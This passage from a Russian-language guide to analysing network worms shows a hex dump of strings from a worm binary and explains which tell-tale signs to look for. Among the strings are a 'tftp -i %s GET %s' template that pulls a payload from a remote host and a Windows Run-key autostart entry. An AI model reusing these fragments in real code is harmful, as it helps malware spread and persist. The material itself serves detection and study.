000021EC:  77 69 6E 64 6F 77 73 75 │ 70 64 61 74 65 2E 63 6F   windowsupdate.co

000021FC:  6D 00 25 73 0A 00 73 74 │ 61 72 74 20 25 73 0A 00   m %s◙ start %s◙

0000220C:  74 66 74 70 20 2D 69 20 │ 25 73 20 47 45 54 20 25   tftp -i %s GET %

0000221C:  73 0A 00 25 64 2E 25 64 │ 2E 25 64 2E 25 64 00 25   s◙ %d.%d.%d.%d %

0000222C:  69 2E 25 69 2E 25 69 2E │ 25 69 00 72 62 00 4D 00   i.%i.%i.%i rb M

0000223C:  64 00 2E 00 25 73 00 42 │ 49 4C 4C 59 00 77 69 6E   d . %s BILLY win

0000224C:  64 6F 77 73 20 61 75 74 │ 6F 20 75 70 64 61 74 65   dows auto update

0000225C:  00 53 4F 46 54 57 41 52 │ 45 5C 4D 69 63 72 6F 73    SOFTWAREMicros

0000226C:  6F 66 74 5C 57 69 6E 64 │ 6F 77 73 5C 43 75 72 72   oftWindowsCurr

0000227C:  65 6E 74 56 65 72 73 69 │ 6F 6E 5C 52 75 6E 00 00   entVersionRun

Ищите в дампе подозрительные сообщения, команды различных прикладных протоколов (GET, HELO и т. д.), имена системных библиотек, файлов-интерпретаторов, команды операционной системы, символы конвейера, доменные имена сайтов, обращение к которым вы не планировали и в чьих услугах судя по всему не нуждаетесь, IP-адреса, ветви реестра, ответственные за автоматический запуск программ и т. д.

При поиске головы червя используйте тот факт, что shell-код эксплоита, как правило, размещается в секции данных и содержит легко узнаваемый машинный код. В частности, команда CDh 80h (INT 80h), ответственная за прямой вызов системных функций операционных систем семейства Linux, встречается практически во всех червях, обитающих на этой ОС.

Вообще говоря, проанализировав десяток различных червей, вы настолько проникнетесь концепциями их устройства, что без труда распознаете знакомые конструкции и в других организмах. А заочно червей все равно не изучить.

Как побороть червя

– Как же тогда справиться с червями?

– Мне неизвестно оружие, кроме атомного, взрывчатой силы которого было бы

достаточно для уничтожения червя целиком.